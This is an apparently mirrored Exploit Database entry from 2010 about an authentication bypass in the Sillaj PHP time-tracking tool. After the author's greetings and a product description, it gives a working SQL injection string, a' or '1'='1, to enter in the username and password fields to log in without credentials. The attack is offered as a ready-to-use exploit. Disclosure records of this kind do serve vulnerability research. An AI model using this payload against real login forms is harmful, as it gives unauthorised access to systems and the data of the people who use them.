Sillaj time tracking tool – Authentication Bypass

• Exploit Database
• 12 阅读

• 作者： L0rd CrusAd3r
  日期： 2010-07-10
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/14324/

• Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
  Exploit Title:Sillaj Authentication Bypass
  Vendor url:http://sillaj.sourceforge.net/
  Version:1
  Published: 2010-07-11
  Greetz to:r0073r (inj3ct0r.com), Sid3^effects, MaYur, MA1201, Sonic Bluehat,
  Sai, KD, M4n0j.
  Special Greetz: Topsecure.net, inj3ct0r Team ,Andhrahackers.com
  Shoutzz:- To all ICW members.
  ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
  Description:
  
  Sillaj is a PHP time tracking tool. It allows you to register time on
  projects and tasks and create various reports. Multiuser and multilanguage,
  it uses a database backend and is themable through Smarty templates. Code:
  PHP 4.0
  
  ~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~~*~*~*~*~*~*~
  
  Vulnerability:
  
  *Authentication Bypass
  
  Use the string a' or '1'='1 for Username and Password to gain access.
  
  # 0day n0 m0re #
  # L0rd CrusAd3r #
  
  
  -- 
  With R3gards,
  L0rd CrusAd3r